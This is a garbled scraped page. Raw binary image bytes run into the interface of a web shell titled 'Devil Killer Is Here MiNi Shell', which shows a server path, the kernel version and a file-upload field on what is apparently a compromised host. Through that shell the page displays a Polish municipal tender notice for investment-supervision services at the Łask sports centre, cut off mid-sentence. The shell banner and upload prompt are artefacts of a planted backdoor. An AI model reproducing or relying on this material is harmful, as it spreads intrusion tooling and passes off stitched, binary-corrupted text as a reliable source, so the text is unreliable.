JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240726/0043158301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe pełnienie funkcji inspektora nadzoru inwestorskiego zadania inwestycyjnego pn. „Modernizacja Centrum Sportu i Rekreacji w Łasku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łask</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934513</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 43 676 83 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 43 676 83 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp_oferta@lask.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe pełnienie funkcji inspektora nadzoru inwestorskiego zadania inwestycyjnego pn. „Modernizacja Centrum Sportu i Rekreacji w Łasku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ebb67afe-df30-4f43-bffb-16f3db362460</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00431583</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00053080/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Kompleksowe pełnienie funkcji inspektora nadzoru inwestorskiego zadania inwestycyjnego pn.: „Modernizacja Centrum Sportu i Rekreacji w Łasku”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ebb67afe-df30-4f43-bffb-16f3db362460 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a<br/>wykonawcami odbywa się przy użyciu platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja między Zamawiającym<br/>a Wykonawcami, w tym przekazywanie wszelkich oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się przy użyciu<br/>platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl/.<br/>2) Zamawiający wymaga złożenia oferty w formie elektronicznej, tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym, wystawionym przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi<br/>certyfikacyjne - podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach<br/>zaufania oraz identyfikacji elektronicznej (t.j.: Dz. U. z 2021 r. poz. 1797 z późn. zm.) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym za pośrednictwem platformy pod adresem: https://ezamowienia.gov.pl/.<br/>3) Pozostałe informacje zostały określone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy:<br/>1. Administratorem Pani/Pana danych osobowych jest: Burmistrz Łasku, ul. Warszawska 14,<br/>98-100 Łask, tel. +48 43 676 83 00, e-mail: um@lask.pl.<br/>2. Inspektorem danych osobowych w Gminie Łask jest firma Elit Partner Sp. z o.o. Dane kontaktowe do Inspektora Ochrony Danych:<br/>iod@lask.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego, którego przedmiotem jest Kompleksowe pełnienie funkcji inspektora nadzoru inwestorskiego<br/>zadania inwestycyjnego pn. „Modernizacja Centrum Sportu i Rekreacji w Łasku” (sygnatura postępowania RO.271.13.2024),<br/>prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust.1 ustawy.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres<br/>obowiązywania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>8. Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>Ogłoszenie nr 2024/BZP 00397172/01 z dnia 2024-07-04<br/>2024-07-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RO.271.17.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowe pełnienie funkcji inspektora nadzoru inwestorskiego zadania inwestycyjnego<br/>pn. „Modernizacja Centrum Sportu i Rekreacji w Łasku” finansowanego w ramach zadania budżetowego „Modernizacja i<br/>rozbudowa Centrum Sportu i Rekreacji w Łasku&#34;. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71500000-3 - Usługi związane z budownictwem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert:<br/><br/>1)	Cena ofertowa (80%, maks. 80 pkt.)<br/><br/>Wymagania jakościowe dla usługi nadzoru inwestorskiego nad modernizacją Centrum Sportu i Rekreacji w Łasku zostały określone we wzorze umowy załączonym do SWZ, w którym Zamawiający szczegółowo opisał obowiązki inspektora nadzoru. Osoba pełniąca samodzielną funkcję techniczną w budownictwie (m.in. nadzór inwestorski) posiada odpowiednie wykształcenie techniczne i praktykę zawodową dostosowaną do rodzaju, stopnia skomplikowania działalności oraz innych wymagań związanych z wykonywaną funkcją, stwierdzone decyzją wydaną przez organ samorządu zawodowego. Ponadto prawa i obowiązki inspektora nadzoru inwestorskiego zostały określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane.<br/><br/>Liczba przyznanych punktów w ramach tego kryterium zostanie określona według wzoru:<br/>PC = Cn/Cbo x 100 x 80%<br/>gdzie:<br/>PC - suma uzyskanych punktów badanej oferty w ramach kryterium<br/>Cn – najniższa cena ofertowa <br/>Cbo – cena badanej oferty<br/><br/>Wynik działania zostanie zaokrąglony do 2 miejsc po przecinku.<br/><br/>2)	Doświadczenie osób skierowanych przez wykonawcę do realizacji zamówienia (20%, maks. 20 pkt.)<br/><br/>Ocenie poddane zostanie doświadczenie inspektora nadzoru inwestorskiego branży konstrukcyjno-budowlanej skierowanego do realizacji zamówienia.<br/>Liczba przyznanych punktów w ramach tego kryterium zostanie określona według poniższych zasad na podstawie wypełnionego przez Wykonawcę formularza ofertowego dotyczącego doświadczenia koordynatora nadzoru inwestorskiego wszystkich branż oraz inspektora nadzoru branży konstrukcyjno-budowalnej skierowanego do realizacji zamówienia:<br/>a)	za skierowanie do realizacji zamówienia osoby, która w okresie 6 lat przed upływem terminu składania ofert, a jeśli okres posiadanych uprawnień budowlanych jest krótszy, w tym okresie, pełniła funkcję koordynatora inspektorów nadzoru inwestorskiego (m.in. branża drogowa, sanitarna, elektroenergetyczna) oraz inspektora nadzoru inwestorskiego (w rozumieniu ustawy Prawo budowlane) branży konstrukcyjno-budowlanej nad wykonaniem:<br/>	1 roboty polegających na budowie obiektu stadionowego obejmującego: pełnowymiarowe boisko z trawą naturalną z systemem drenażu oraz pełnowymiarową bieżnię okrężną o nawierzchni poliuretanowej o długości nominalnej 400 m – oferta otrzyma 0 punktów w tym kryterium,<br/>	2 lub więcej robót polegających na budowie obiektu stadionowego obejmującego: pełnowymiarowe boisko z trawą naturalną z systemem drenażu oraz pełnowymiarową bieżnię okrężną o nawierzchni poliuretanowej o długości nominalnej 400 m – oferta otrzyma 20 punktów w tym kryterium .<br/><br/>UWAGA:<br/>	Zamawiający dopuszcza również wykazanie się doświadczeniem zawodowym w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w ramach odrębnych zadań dla pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz dla pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m na obiekcie stadionowym, w takim przypadku 1 para robót budowalnych obejmująca 1 robotę polegającą na budowie pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz 1 robotę polegającą na budowie pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m traktowana będzie przez Zamawiającego ŁĄCZNIE jako 1 robota budowlana spełniająca warunki przyznania dodatkowej punktacji. <br/><br/>b)	w przypadku, gdy Wykonawca nie wypełni w Formularzu ofertowym punktu dotyczącego doświadczenia inspektora nadzoru inwestorskiego branży konstrukcyjno-budowlanej skierowanego do realizacji zamówienia – oferta otrzyma 0 punktów w tym kryterium.<br/>Jako najkorzystniejsza zostanie wybrana oferta wykonawcy, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów wyliczoną jako sumę punktów uzyskanych w ramach ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych przez wykonawcę do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunki udziału w postępowaniu w sposób proporcjonalny do przedmiotu zamówienia oraz umożliwiający ocenę zdolności wykonawcy do należytego wykonania zamówienia, w szczególności wyrażając je jako minimalne poziomy zdolności. Warunki udziału mogą dotyczyć:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym – w niniejszym postępowaniu zamawiający nie określa tego warunku;<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów – w niniejszym postępowaniu zamawiający nie określa tego warunku;<br/><br/>3)	sytuacji ekonomicznej lub finansowej – w niniejszym postępowaniu zamawiający nie określa tego warunku;<br/><br/>4)	zdolności technicznej lub zawodowej – w niniejszym postępowaniu Zamawiający określa ten warunek w następujący sposób – w postępowaniu mogą wziąć udział Wykonawcy, którzy:<br/><br/>a)	nie wcześniej niż w okresie ostatnich 6 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonali, tj. zakończyli:<br/><br/>	co najmniej 2 usługi polegające na kompleksowym nadzorze inwestorskim w zakresie m.in. branży konstrukcyjno-budowalnej, sanitarnej, elektroenergetycznej nad wykonaniem roboty budowlanej polegającej na budowie obiektu stadionowego obejmującego: pełnowymiarowe boisko z trawą naturalną z systemem drenażu oraz pełnowymiarową bieżnię okrężną o nawierzchni poliuretanowej o długości nominalnej 400 m , lub<br/><br/>	co najmniej 4 usługi polegające na kompleksowym nadzorze inwestorskim w zakresie m.in. branży konstrukcyjno-budowalnej, sanitarnej, elektroenergetycznej, z których:<br/>•	dwie obejmowały wykonanie robót budowlanych polegających na budowie pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz<br/>•	dwie obejmowały robotę polegającą na budowie pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m, lub<br/><br/>	co najmniej 3 usługi polegające na kompleksowym nadzorze inwestorskim w zakresie m.in. branży konstrukcyjno-budowalnej, sanitarnej, elektroenergetycznej, z których:<br/>•	jedna obejmowała wykonanie roboty budowlanej polegającej na budowie obiektu stadionowego obejmującego: pełnowymiarowe boisko z trawą naturalną z systemem drenażu oraz pełnowymiarową bieżnię okrężną o nawierzchni poliuretanowej o długości nominalnej 400 m oraz<br/>•	jedna obejmowała wykonanie roboty budowlanej polegającej na budowie pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz<br/>•	jedna obejmowała wykonanie roboty budowlanej polegającej na budowie pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m.<br/><br/>b)	dysponują lub będą dysponować 1 osobą, która będzie pełnić funkcję koordynatora inspektorów nadzoru inwestorskiego wszystkich branż oraz jednocześnie inspektora nadzoru branży konstrukcyjno-budowlanej posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowalnej, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającą doświadczenie polegające na pełnieniu funkcji koordynatora inspektorów nadzoru inwestorskiego (m.in. branża konstrukcyjno-budowalna, sanitarna, elektroenergetyczna) oraz inspektora nadzoru inwestorskiego (w rozumieniu ustawy Prawo budowlane) branży konstrukcyjno-budowlanej nad wykonaniem 1 roboty budowlanej polegającej na budowie obiektu stadionowego obejmującego: pełnowymiarowe boisko z trawą naturalną z systemem drenażu oraz pełnowymiarową bieżnię okrężną o nawierzchni poliuretanowej o długości nominalnej 400 m.<br/><br/>UWAGA:<br/>Zamawiający dopuszcza również wykazanie się posiadaniem doświadczenia polegającego na pełnieniu funkcji koordynatora inspektorów nadzoru inwestorskiego (m.in. branża konstrukcyjno-budowalna, sanitarna, elektroenergetyczna) oraz pełnieniu funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w ramach odrębnych zadań dla pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz dla pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m na obiekcie stadionowym, tj. wykazanie się posiadaniem doświadczenia polegającego na pełnieniu funkcji koordynatora inspektorów nadzoru inwestorskiego (m.in. branża konstrukcyjno-budowalna, sanitarna, elektroenergetyczna) oraz pełnieniu funkcji inspektora nadzoru inwestorskiego nad:<br/><br/>•	parą robót budowlanych wykonanych w ramach odrębnych zadań obejmujących 1 robotę polegającą na budowie pełnowymiarowego boiska z trawą naturalną z systemem drenażu na obiekcie stadionowym oraz 1 robotę polegającą na budowie pełnowymiarowej bieżni okrężnej o nawierzchni poliuretanowej o długości nominalnej 400 m, <br/><br/>c)	dysponują lub będą dysponować 1 osobą, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w branży elektroenergetycznej posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/><br/>d)	dysponują lub będą dysponować 1 osobą, która będzie pełnić funkcję inspektora nadzoru w branży sanitarnej posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji 